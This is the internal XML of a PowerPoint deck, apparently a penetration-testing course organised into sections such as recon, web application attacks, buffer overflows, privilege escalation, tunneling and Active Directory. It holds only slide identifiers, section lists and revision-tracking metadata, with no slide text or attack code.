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8" r:id="rId2"/>
    <p:sldMasterId id="2147483701" r:id="rId3"/>
    <p:sldMasterId id="2147483724" r:id="rId4"/>
    <p:sldMasterId id="2147483747" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId317"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="822" r:id="rId6"/>
    <p:sldId id="288" r:id="rId7"/>
    <p:sldId id="289" r:id="rId8"/>
    <p:sldId id="290" r:id="rId9"/>
    <p:sldId id="291" r:id="rId10"/>
    <p:sldId id="292" r:id="rId11"/>
    <p:sldId id="293" r:id="rId12"/>
    <p:sldId id="607" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="296" r:id="rId16"/>
    <p:sldId id="608" r:id="rId17"/>
    <p:sldId id="297" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="299" r:id="rId20"/>
    <p:sldId id="609" r:id="rId21"/>
    <p:sldId id="300" r:id="rId22"/>
    <p:sldId id="610" r:id="rId23"/>
    <p:sldId id="611" r:id="rId24"/>
    <p:sldId id="304" r:id="rId25"/>
    <p:sldId id="612" r:id="rId26"/>
    <p:sldId id="613" r:id="rId27"/>
    <p:sldId id="614" r:id="rId28"/>
    <p:sldId id="308" r:id="rId29"/>
    <p:sldId id="309" r:id="rId30"/>
    <p:sldId id="615" r:id="rId31"/>
    <p:sldId id="311" r:id="rId32"/>
    <p:sldId id="312" r:id="rId33"/>
    <p:sldId id="313" r:id="rId34"/>
    <p:sldId id="314" r:id="rId35"/>
    <p:sldId id="315" r:id="rId36"/>
    <p:sldId id="316" r:id="rId37"/>
    <p:sldId id="317" r:id="rId38"/>
    <p:sldId id="616" r:id="rId39"/>
    <p:sldId id="617" r:id="rId40"/>
    <p:sldId id="618" r:id="rId41"/>
    <p:sldId id="619" r:id="rId42"/>
    <p:sldId id="620" r:id="rId43"/>
    <p:sldId id="621" r:id="rId44"/>
    <p:sldId id="622" r:id="rId45"/>
    <p:sldId id="624" r:id="rId46"/>
    <p:sldId id="625" r:id="rId47"/>
    <p:sldId id="626" r:id="rId48"/>
    <p:sldId id="627" r:id="rId49"/>
    <p:sldId id="628" r:id="rId50"/>
    <p:sldId id="629" r:id="rId51"/>
    <p:sldId id="630" r:id="rId52"/>
    <p:sldId id="631" r:id="rId53"/>
    <p:sldId id="632" r:id="rId54"/>
    <p:sldId id="366" r:id="rId55"/>
    <p:sldId id="633" r:id="rId56"/>
    <p:sldId id="634" r:id="rId57"/>
    <p:sldId id="635" r:id="rId58"/>
    <p:sldId id="636" r:id="rId59"/>
    <p:sldId id="637" r:id="rId60"/>
    <p:sldId id="638" r:id="rId61"/>
    <p:sldId id="639" r:id="rId62"/>
    <p:sldId id="640" r:id="rId63"/>
    <p:sldId id="641" r:id="rId64"/>
    <p:sldId id="367" r:id="rId65"/>
    <p:sldId id="369" r:id="rId66"/>
    <p:sldId id="368" r:id="rId67"/>
    <p:sldId id="371" r:id="rId68"/>
    <p:sldId id="642"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65" r:id="rId82"/>
    <p:sldId id="357" r:id="rId83"/>
    <p:sldId id="358" r:id="rId84"/>
    <p:sldId id="359" r:id="rId85"/>
    <p:sldId id="361" r:id="rId86"/>
    <p:sldId id="370" r:id="rId87"/>
    <p:sldId id="360" r:id="rId88"/>
    <p:sldId id="362" r:id="rId89"/>
    <p:sldId id="363" r:id="rId90"/>
    <p:sldId id="364" r:id="rId91"/>
    <p:sldId id="643" r:id="rId92"/>
    <p:sldId id="644" r:id="rId93"/>
    <p:sldId id="645" r:id="rId94"/>
    <p:sldId id="578" r:id="rId95"/>
    <p:sldId id="579" r:id="rId96"/>
    <p:sldId id="580" r:id="rId97"/>
    <p:sldId id="581" r:id="rId98"/>
    <p:sldId id="582" r:id="rId99"/>
    <p:sldId id="583" r:id="rId100"/>
    <p:sldId id="584" r:id="rId101"/>
    <p:sldId id="585" r:id="rId102"/>
    <p:sldId id="586" r:id="rId103"/>
    <p:sldId id="587" r:id="rId104"/>
    <p:sldId id="588" r:id="rId105"/>
    <p:sldId id="589" r:id="rId106"/>
    <p:sldId id="590" r:id="rId107"/>
    <p:sldId id="591" r:id="rId108"/>
    <p:sldId id="592" r:id="rId109"/>
    <p:sldId id="593" r:id="rId110"/>
    <p:sldId id="594" r:id="rId111"/>
    <p:sldId id="595" r:id="rId112"/>
    <p:sldId id="596" r:id="rId113"/>
    <p:sldId id="597" r:id="rId114"/>
    <p:sldId id="598" r:id="rId115"/>
    <p:sldId id="599" r:id="rId116"/>
    <p:sldId id="600" r:id="rId117"/>
    <p:sldId id="601" r:id="rId118"/>
    <p:sldId id="602" r:id="rId119"/>
    <p:sldId id="603" r:id="rId120"/>
    <p:sldId id="604" r:id="rId121"/>
    <p:sldId id="605" r:id="rId122"/>
    <p:sldId id="606" r:id="rId123"/>
    <p:sldId id="646" r:id="rId124"/>
    <p:sldId id="647" r:id="rId125"/>
    <p:sldId id="648" r:id="rId126"/>
    <p:sldId id="649" r:id="rId127"/>
    <p:sldId id="650" r:id="rId128"/>
    <p:sldId id="651" r:id="rId129"/>
    <p:sldId id="652" r:id="rId130"/>
    <p:sldId id="653" r:id="rId131"/>
    <p:sldId id="654" r:id="rId132"/>
    <p:sldId id="655" r:id="rId133"/>
    <p:sldId id="656" r:id="rId134"/>
    <p:sldId id="657" r:id="rId135"/>
    <p:sldId id="658" r:id="rId136"/>
    <p:sldId id="659" r:id="rId137"/>
    <p:sldId id="660" r:id="rId138"/>
    <p:sldId id="661" r:id="rId139"/>
    <p:sldId id="662" r:id="rId140"/>
    <p:sldId id="663" r:id="rId141"/>
    <p:sldId id="664" r:id="rId142"/>
    <p:sldId id="665" r:id="rId143"/>
    <p:sldId id="666" r:id="rId144"/>
    <p:sldId id="667" r:id="rId145"/>
    <p:sldId id="668" r:id="rId146"/>
    <p:sldId id="669" r:id="rId147"/>
    <p:sldId id="670" r:id="rId148"/>
    <p:sldId id="671" r:id="rId149"/>
    <p:sldId id="672" r:id="rId150"/>
    <p:sldId id="673" r:id="rId151"/>
    <p:sldId id="674" r:id="rId152"/>
    <p:sldId id="675" r:id="rId153"/>
    <p:sldId id="676" r:id="rId154"/>
    <p:sldId id="677" r:id="rId155"/>
    <p:sldId id="678" r:id="rId156"/>
    <p:sldId id="679" r:id="rId157"/>
    <p:sldId id="680" r:id="rId158"/>
    <p:sldId id="681" r:id="rId159"/>
    <p:sldId id="682" r:id="rId160"/>
    <p:sldId id="683" r:id="rId161"/>
    <p:sldId id="684" r:id="rId162"/>
    <p:sldId id="685" r:id="rId163"/>
    <p:sldId id="686" r:id="rId164"/>
    <p:sldId id="687" r:id="rId165"/>
    <p:sldId id="688" r:id="rId166"/>
    <p:sldId id="689" r:id="rId167"/>
    <p:sldId id="690" r:id="rId168"/>
    <p:sldId id="691" r:id="rId169"/>
    <p:sldId id="692" r:id="rId170"/>
    <p:sldId id="693" r:id="rId171"/>
    <p:sldId id="694" r:id="rId172"/>
    <p:sldId id="695" r:id="rId173"/>
    <p:sldId id="696" r:id="rId174"/>
    <p:sldId id="697" r:id="rId175"/>
    <p:sldId id="698" r:id="rId176"/>
    <p:sldId id="699" r:id="rId177"/>
    <p:sldId id="700" r:id="rId178"/>
    <p:sldId id="701" r:id="rId179"/>
    <p:sldId id="702" r:id="rId180"/>
    <p:sldId id="703" r:id="rId181"/>
    <p:sldId id="704" r:id="rId182"/>
    <p:sldId id="705" r:id="rId183"/>
    <p:sldId id="706" r:id="rId184"/>
    <p:sldId id="707" r:id="rId185"/>
    <p:sldId id="708" r:id="rId186"/>
    <p:sldId id="709" r:id="rId187"/>
    <p:sldId id="710" r:id="rId188"/>
    <p:sldId id="711" r:id="rId189"/>
    <p:sldId id="712" r:id="rId190"/>
    <p:sldId id="713" r:id="rId191"/>
    <p:sldId id="714" r:id="rId192"/>
    <p:sldId id="715" r:id="rId193"/>
    <p:sldId id="716" r:id="rId194"/>
    <p:sldId id="717" r:id="rId195"/>
    <p:sldId id="718" r:id="rId196"/>
    <p:sldId id="719" r:id="rId197"/>
    <p:sldId id="720" r:id="rId198"/>
    <p:sldId id="721" r:id="rId199"/>
    <p:sldId id="722" r:id="rId200"/>
    <p:sldId id="723" r:id="rId201"/>
    <p:sldId id="724" r:id="rId202"/>
    <p:sldId id="725" r:id="rId203"/>
    <p:sldId id="256" r:id="rId204"/>
    <p:sldId id="257" r:id="rId205"/>
    <p:sldId id="258" r:id="rId206"/>
    <p:sldId id="259" r:id="rId207"/>
    <p:sldId id="260" r:id="rId208"/>
    <p:sldId id="283" r:id="rId209"/>
    <p:sldId id="265" r:id="rId210"/>
    <p:sldId id="261" r:id="rId211"/>
    <p:sldId id="262" r:id="rId212"/>
    <p:sldId id="263" r:id="rId213"/>
    <p:sldId id="264" r:id="rId214"/>
    <p:sldId id="266" r:id="rId215"/>
    <p:sldId id="268" r:id="rId216"/>
    <p:sldId id="269" r:id="rId217"/>
    <p:sldId id="270" r:id="rId218"/>
    <p:sldId id="271" r:id="rId219"/>
    <p:sldId id="272" r:id="rId220"/>
    <p:sldId id="273" r:id="rId221"/>
    <p:sldId id="274" r:id="rId222"/>
    <p:sldId id="275" r:id="rId223"/>
    <p:sldId id="276" r:id="rId224"/>
    <p:sldId id="277" r:id="rId225"/>
    <p:sldId id="278" r:id="rId226"/>
    <p:sldId id="279" r:id="rId227"/>
    <p:sldId id="280" r:id="rId228"/>
    <p:sldId id="281" r:id="rId229"/>
    <p:sldId id="282" r:id="rId230"/>
    <p:sldId id="726" r:id="rId231"/>
    <p:sldId id="427" r:id="rId232"/>
    <p:sldId id="428" r:id="rId233"/>
    <p:sldId id="429" r:id="rId234"/>
    <p:sldId id="430" r:id="rId235"/>
    <p:sldId id="431" r:id="rId236"/>
    <p:sldId id="432" r:id="rId237"/>
    <p:sldId id="435" r:id="rId238"/>
    <p:sldId id="434" r:id="rId239"/>
    <p:sldId id="436" r:id="rId240"/>
    <p:sldId id="437" r:id="rId241"/>
    <p:sldId id="438" r:id="rId242"/>
    <p:sldId id="439" r:id="rId243"/>
    <p:sldId id="440" r:id="rId244"/>
    <p:sldId id="441" r:id="rId245"/>
    <p:sldId id="442" r:id="rId246"/>
    <p:sldId id="443" r:id="rId247"/>
    <p:sldId id="444" r:id="rId248"/>
    <p:sldId id="445" r:id="rId249"/>
    <p:sldId id="446" r:id="rId250"/>
    <p:sldId id="447" r:id="rId251"/>
    <p:sldId id="448" r:id="rId252"/>
    <p:sldId id="449" r:id="rId253"/>
    <p:sldId id="450" r:id="rId254"/>
    <p:sldId id="451" r:id="rId255"/>
    <p:sldId id="452" r:id="rId256"/>
    <p:sldId id="453" r:id="rId257"/>
    <p:sldId id="454" r:id="rId258"/>
    <p:sldId id="455" r:id="rId259"/>
    <p:sldId id="456" r:id="rId260"/>
    <p:sldId id="433" r:id="rId261"/>
    <p:sldId id="457" r:id="rId262"/>
    <p:sldId id="458" r:id="rId263"/>
    <p:sldId id="459" r:id="rId264"/>
    <p:sldId id="773" r:id="rId265"/>
    <p:sldId id="778" r:id="rId266"/>
    <p:sldId id="779" r:id="rId267"/>
    <p:sldId id="780" r:id="rId268"/>
    <p:sldId id="781" r:id="rId269"/>
    <p:sldId id="782" r:id="rId270"/>
    <p:sldId id="783" r:id="rId271"/>
    <p:sldId id="784" r:id="rId272"/>
    <p:sldId id="785" r:id="rId273"/>
    <p:sldId id="786" r:id="rId274"/>
    <p:sldId id="378" r:id="rId275"/>
    <p:sldId id="787" r:id="rId276"/>
    <p:sldId id="788" r:id="rId277"/>
    <p:sldId id="789" r:id="rId278"/>
    <p:sldId id="790" r:id="rId279"/>
    <p:sldId id="791" r:id="rId280"/>
    <p:sldId id="792" r:id="rId281"/>
    <p:sldId id="793" r:id="rId282"/>
    <p:sldId id="794" r:id="rId283"/>
    <p:sldId id="795" r:id="rId284"/>
    <p:sldId id="796" r:id="rId285"/>
    <p:sldId id="797" r:id="rId286"/>
    <p:sldId id="798" r:id="rId287"/>
    <p:sldId id="799" r:id="rId288"/>
    <p:sldId id="800" r:id="rId289"/>
    <p:sldId id="801" r:id="rId290"/>
    <p:sldId id="802" r:id="rId291"/>
    <p:sldId id="803" r:id="rId292"/>
    <p:sldId id="804" r:id="rId293"/>
    <p:sldId id="805" r:id="rId294"/>
    <p:sldId id="806" r:id="rId295"/>
    <p:sldId id="807" r:id="rId296"/>
    <p:sldId id="808" r:id="rId297"/>
    <p:sldId id="809" r:id="rId298"/>
    <p:sldId id="810" r:id="rId299"/>
    <p:sldId id="811" r:id="rId300"/>
    <p:sldId id="812" r:id="rId301"/>
    <p:sldId id="813" r:id="rId302"/>
    <p:sldId id="814" r:id="rId303"/>
    <p:sldId id="815" r:id="rId304"/>
    <p:sldId id="816" r:id="rId305"/>
    <p:sldId id="817" r:id="rId306"/>
    <p:sldId id="818" r:id="rId307"/>
    <p:sldId id="819" r:id="rId308"/>
    <p:sldId id="820" r:id="rId309"/>
    <p:sldId id="372" r:id="rId310"/>
    <p:sldId id="373" r:id="rId311"/>
    <p:sldId id="374" r:id="rId312"/>
    <p:sldId id="375" r:id="rId313"/>
    <p:sldId id="376" r:id="rId314"/>
    <p:sldId id="377" r:id="rId315"/>
    <p:sldId id="821" r:id="rId3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me Notes" id="{3CF42BAF-BFF5-43E8-A4B7-904C3BADCAD6}">
          <p14:sldIdLst>
            <p14:sldId id="822"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="1 - Recon" id="{3D69527F-2B0C-469D-85E9-780A92067B60}">
          <p14:sldIdLst>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="607"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="608"/>
            <p14:sldId id="297"/>
            <p14:sldId id="298"/>
            <p14:sldId id="299"/>
            <p14:sldId id="609"/>
            <p14:sldId id="300"/>
            <p14:sldId id="610"/>
            <p14:sldId id="611"/>
            <p14:sldId id="304"/>
            <p14:sldId id="612"/>
            <p14:sldId id="613"/>
            <p14:sldId id="614"/>
            <p14:sldId id="308"/>
            <p14:sldId id="309"/>
            <p14:sldId id="615"/>
            <p14:sldId id="311"/>
            <p14:sldId id="312"/>
            <p14:sldId id="313"/>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="316"/>
            <p14:sldId id="317"/>
            <p14:sldId id="616"/>
            <p14:sldId id="617"/>
            <p14:sldId id="618"/>
            <p14:sldId id="619"/>
            <p14:sldId id="620"/>
            <p14:sldId id="621"/>
            <p14:sldId id="622"/>
            <p14:sldId id="624"/>
            <p14:sldId id="625"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="2 - Web Application Attacks" id="{C8D80575-988F-4192-A54B-BB3541972220}">
          <p14:sldIdLst>
            <p14:sldId id="626"/>
            <p14:sldId id="627"/>
            <p14:sldId id="628"/>
            <p14:sldId id="629"/>
            <p14:sldId id="630"/>
            <p14:sldId id="631"/>
            <p14:sldId id="632"/>
            <p14:sldId id="366"/>
            <p14:sldId id="633"/>
            <p14:sldId id="634"/>
            <p14:sldId id="635"/>
            <p14:sldId id="636"/>
            <p14:sldId id="637"/>
            <p14:sldId id="638"/>
            <p14:sldId id="639"/>
            <p14:sldId id="640"/>
            <p14:sldId id="641"/>
            <p14:sldId id="367"/>
            <p14:sldId id="369"/>
            <p14:sldId id="368"/>
            <p14:sldId id="371"/>
            <p14:sldId id="642"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="347"/>
            <p14:sldId id="348"/>
            <p14:sldId id="349"/>
            <p14:sldId id="350"/>
            <p14:sldId id="351"/>
            <p14:sldId id="352"/>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="355"/>
            <p14:sldId id="356"/>
            <p14:sldId id="365"/>
            <p14:sldId id="357"/>
            <p14:sldId id="358"/>
            <p14:sldId id="359"/>
            <p14:sldId id="361"/>
            <p14:sldId id="370"/>
            <p14:sldId id="360"/>
            <p14:sldId id="362"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
            <p14:sldId id="643"/>
            <p14:sldId id="644"/>
            <p14:sldId id="645"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="3 - Buffer Overflows" id="{8C26C51D-111A-4C56-8329-5C5881DF388B}">
          <p14:sldIdLst>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Lst>
        </p14:section>
        <p14:section name="4- Scripting and Public Exploits" id="{5CF94C86-62AE-4744-A6C5-6E4205B7215B}">
          <p14:sldIdLst>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Lst>
        </p14:section>
        <p14:section name="5- Linux Privilege Escalation" id="{AB92CE42-695A-4104-8EFF-28BFE3DD4D66}">
          <p14:sldIdLst>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Lst>
        </p14:section>
        <p14:section name="6 - Windows Privilege Escalation" id="{070FFE75-19AC-414B-8E07-BCC3E52145BC}">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Lst>
        </p14:section>
        <p14:section name="7- Tunneling and Port Redirection" id="{FCAEA6C6-7AC2-4EFA-8619-10B68DB63C16}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="283"/>
            <p14:sldId id="265"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="266"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="726"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="8 - Know Your Tools" id="{4788389E-95FB-4220-9A9D-CE49DCB5790A}">
          <p14:sldIdLst>
            <p14:sldId id="427"/>
            <p14:sldId id="428"/>
            <p14:sldId id="429"/>
            <p14:sldId id="430"/>
            <p14:sldId id="431"/>
            <p14:sldId id="432"/>
            <p14:sldId id="435"/>
            <p14:sldId id="434"/>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33"/>
            <p14:sldId id="457"/>
            <p14:sldId id="458"/>
            <p14:sldId id="459"/>
            <p14:sldId id="773"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="9 - Active Directory" id="{80054051-68DD-443F-8BC4-0D781045FCDE}">
          <p14:sldIdLst>
            <p14:sldId id="778"/>
            <p14:sldId id="779"/>
            <p14:sldId id="780"/>
            <p14:sldId id="781"/>
            <p14:sldId id="782"/>
            <p14:sldId id="783"/>
            <p14:sldId id="784"/>
            <p14:sldId id="785"/>
            <p14:sldId id="786"/>
            <p14:sldId id="378"/>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372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="8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5D2053-E116-45B8-A391-7B5E774D07B5}" v="10" dt="2022-04-11T18:33:43.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59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notesMaster" Target="notesMasters/notesMaster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presProps" Target="presProp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theme" Target="theme/theme1.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tableStyles" Target="tableStyles.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t Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}"/>
    <pc:docChg chg="undo custSel modSld modMainMaster">
      <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:22.784" v="284" actId="6014"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1351310901" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1351310901" sldId="256"/>
            <ac:spMk id="3" creationId="{B2BF2284-5148-4E1E-8541-5286DFBB0D85}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2180241869" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2180241869" sldId="257"/>
            <ac:spMk id="2" creationId="{9D27A166-21AE-474B-BBDF-4EE98C6C4916}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2180241869" sldId="257"/>
            <ac:spMk id="3" creationId="{04F5BD7F-36AB-4DF4-BDCE-ECA7C0ABFE84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2180241869" sldId="257"/>
            <ac:spMk id="4" creationId="{C9261E33-F169-4EAC-AA61-21D90DFBF89D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1370727899" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1370727899" sldId="258"/>
            <ac:spMk id="2" creationId="{B49E85D0-AD62-4727-A44F-E06E99A055C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1370727899" sldId="258"/>
            <ac:spMk id="3" creationId="{1E70BDDB-A019-4D5B-BF0F-39E9BE3A0A90}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3548788797" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3548788797" sldId="259"/>
            <ac:spMk id="2" creationId="{AF883723-2991-4907-BD6A-B081164F707B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3548788797" sldId="259"/>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163704004" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="163704004" sldId="260"/>
            <ac:spMk id="2" creationId="{AF883723-2991-4907-BD6A-B081164F707B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="163704004" sldId="260"/>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2147717845" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2147717845" sldId="261"/>
            <ac:spMk id="2" creationId="{C9D75ABE-257D-42F8-B6CE-CE1987E44E7E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2147717845" sldId="261"/>
            <ac:spMk id="3" creationId="{125CDC6F-5567-4ADD-87AE-A9A1AF4DD4AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2147717845" sldId="261"/>
            <ac:spMk id="4" creationId="{8668AB35-B44A-4313-AE82-7A8401692629}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="169272139" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="169272139" sldId="262"/>
            <ac:spMk id="2" creationId="{31730FEB-1270-447D-8061-407B32DC91D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="169272139" sldId="262"/>
            <ac:spMk id="3" creationId="{3CB9D370-9F7C-4349-884D-58FE7402F4AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3997934229" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
